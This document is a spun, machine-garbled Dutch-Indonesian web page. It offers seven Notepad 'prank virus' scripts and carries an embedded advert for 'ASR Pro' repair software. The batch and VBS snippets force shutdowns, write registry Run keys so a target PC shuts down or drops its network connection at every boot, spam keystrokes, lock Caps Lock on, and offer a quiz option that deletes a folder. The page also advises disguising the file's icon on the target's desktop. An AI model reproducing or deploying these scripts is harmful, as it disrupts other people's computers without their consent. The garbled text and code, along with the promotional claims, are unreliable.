You are currently viewing Oplossing Voor Membuat Spyware Dengan Notepad

Oplossing Voor Membuat Spyware Dengan Notepad

Als u een Membuat Spyware Dengan-kladblokfout krijgt, is het moderne artikel hier om u te helpen.

Snelle en gemakkelijke pc-reparatie

  • 1. Download en installeer ASR Pro
  • 2. Open het programma en klik op "Scannen"
  • 3. Klik op "Repareren" om het reparatieproces te starten
  • Geniet van een snellere

    Siapa sih yang tidak takut dengan zaad computer infectie? computersysteemvirus terkena, maka besar kemungkinan computerwerkstation kamu jadi tidak bisa digunakan. Apalagi jika computer kamu kena salah satu dari 20 virussen computer paling berbahaya dunia di.Tamat sudah, antara harus beli computer baru atau install ulang.

    Di balik seramnya serangan virus computer, maka berikan jalantikus kamu kumpulan script nuller buat membuat virus computer sederhana. Mau Biar Nggak? kelihatan pintar kajak nullr profesional gitu.simak 7 script hoest membuat pc sederhana dengan kladblok.

    7 Membuat Virus Sederhana Hack Script

    Sudah tahu virus computer itu berbahaya, kok JalanTikus bagikan cara membuat virusnya sih? Ya karena virus computer yang JalanTikus bagikan ini kuma berisi stuk over software sederhana yang akan mengacaukan fungsi tanpa computer merusak apparatuur atau membokorkan informasi yang American Dental Association di dalamnya. Jadi Aman David Kokok Voor de computer van de computer menjahili teman kamu.

    1. Membuat-stop

    Virusvirus kerja parasiet computer sederhana ini adalah dengan memaksa computer teman atau target jadi Shutdown. Untuk melakukannya, silakan buka Notepad, serta burn paste code bawah di. Lalu houdt vast aan file-nya nama dengan ForceShutdown.bat type cert file-nya File all.

    @Echo uitbericht veel meer. ik mag jou nietshutdown -j "Fout! De computer is afgesloten!" -MET

    Snelle en gemakkelijke pc-reparatie

    Wordt uw computer iets langzamer dan vroeger? Misschien krijg je steeds meer pop-ups, of lijkt je internetverbinding een beetje vlekkerig. Geen zorgen, er is een oplossing! ASR Pro is de revolutionaire nieuwe software die u helpt al die vervelende Windows-problemen op te lossen met slechts één klik op de knop. Met ASR Pro werkt uw computer in een mum van tijd als nieuw!

  • 1. Download en installeer ASR Pro
  • 2. Open het programma en klik op "Scannen"
  • 3. Klik op "Repareren" om het reparatieproces te starten

  • Zonder mengaktifkan virus ini, kamu harus klik slechts twee papieren kali pada-nya. Maca, Otomatis secara virusini akan berjalan.

    2. Halte Paksa Setiap Kali Dengan Dinyalakan

    berbeda sebelumnya antivirus, sederhana herpes simplex virus yang ini akan memaksa computer teman kamu untuk shutdown setiap kali dinyalakan. Ayts, jangan asal gunakan personal computer ini kalo siap gak tanggung akibatnya ya!

    echo @echo off>c:windowshartlell.batecho-dump>>c:windowshartlell.batecho -r shutdown -t eighty eight -f>>c:windowshartlell.batecho end>>c:windowshartlell.batreg voeg hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI Reg_sz /t /d c:windowshartlell.bat /f toereg boost hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz C:windowshartlell /d.bat /fecho Je bent gehackt.PAUZE

    Simpan bestudeert buatan kamu atas di dengan nama hampi semua. Jangan lupa ekstensi gunakan .moe je uitgeput! Klik op “Minder actief uitschakelen”.

    3. Mematikan Internet Secara Permanent

    Saat berada di suatu online, jaringan pasti kesal dong jika American Dental Assoc. Orang Yang Malach downloaden? Bikin im Internet lemot karena band met berkurang cepat. Makanya, coba Internet matikan teman kamu menggunakan sederhana berikut, virusscenario:

    echo @echo off>c:windowswimn32.batecho-blast>>c:windowswimn32.batecho ipconfig/release_all>>c:windowswimn32.batecho end>>c:windowswimn32.batreg import hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI Reg_sz /t /d c:windowswimn32.bat /freg get hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t /d reg_sz c:windowswimn32.bat /fecho Je bent gehackt!PAUZE

    Sepertibias, simpandengan nama hampir semua gunakan serta ekstensi.bat. Klik voor meer informatie!

    4. Caps Lock

    Siapa yang tidak kesal jika American Dental Association of ngetik isinya huruf besar semua? Orang Yang minerima pesan dengan huruf besar semua jelas akan terganggu, merasa atau bahkan marah. Makanya, yuk isengin teman kamu dengan membuat Caps tombol Lock-nya nyala terus menggunakan viraal script sederhana berikut:

    Kopieer en bewaar de code van de bestanden in Kladblok, laat het gewoon achter met mijn commando ForceCapsLock.vbs en de bestandsversie nya All File. Druk op 3 kali buat mulai mengaktifkan sederhana workstation virus ini.

    5. VirusAlai

    Siapa doet cuma anak muda kekinian doang yang bisa alay? Computer kamu juga bisa alay loh kalo pathogeen terinspeksi toetsenbord alay. Nee, Buat Membuat Virus Computer Jan Akan Membuat PC Toetsenbord Jadi Alai, Kamu Bisa Gunakan Software Sama, Bericut:

    Kopieer Caranya en de stofcode op een stuk papier. Sla het bestand op als ForceAlay.vbs en schrijf het hele bestand op.

    6. Orang Jelek-virus

    membuat malware dengan kladblok

    Dikatain itu jelek emang nyebelin. Kalo kuma sekali dua kali sih harushna masih bisa ditahan, tapi kalo terus-terusan ngatai gimana jelek koba? Nee, dengan kode di bawah ini, kamu bisa membuat sebuah antivirus computer sederhana yang akan memaksa computer doelwit buat mengeluarkan op hun hoede bahwa ‘dia jelek’ tanpa heti.

    Stel wshShell in, wat betekent wscript.CreateObject("WScript.Shell")Doenwscript.slaap 100wshshell.sendkeys "Muka Lu Jelek Kayak Lou's computer"lintje

    Kopieer en plak nulled programma sederhana di ke atas Kladblok. Oh ia, kamu bisa bagian ganti varna merah dengan kata-kata sesuay selera, lalu dengan nama store VirusOrangJelek.vbs.

    7. Quiz-virus

    Semua orang suka kuis kalo apalagi Berhadiah. Tapi kamu bakal kesal deh pasti setiap kalo kali mau buka computer, ternyata yang nongol adalah kuis. Ja dat kan ik? Buat kamu yang mau isengin doelcomputer dengan kuis-kuis menyebalkan, coba kamu gunakan set scripts berikut:

    @Echo uitDe naam is Kuis hari ini!:MenuclassificerenEcho Jika kamu kena hsv apa yang kamu pilih lakukan?PauzeEcho van Yang Mang:echo 1. OchtendcomputerEcho 2. aja-formaatEcho 3. NangisEcho 4. Beli-computerbalkEnter = niets installerenset /p input=select:als %input%==1 -h stop -tdertigif %input%==2 wis c:xxxals %input%==3 @ECHO is uitgeschakeldbericht 6 . Camu gelei meelbericht * Ngacha dulu gih!msg * Hayo leest, CPU scant zelfs gw acak-acak ya4. Ouda berichten, zet oolang aja . opmsg mau kelar kan [email protected] uit:bovenSTART %SystemRoot%system32notepad.exeSta op

    Kopieer en plak die notebook met ViruzQuiz nama.bat. Selesai, tinggal jalankan buat mengujinya.

    Agar berjalan lancar, coba simpan bestand virus computer sederhana yang kamu buat computer di target. Lalu letakkan report tersebut di desktop, tom jangan lupa ubah icon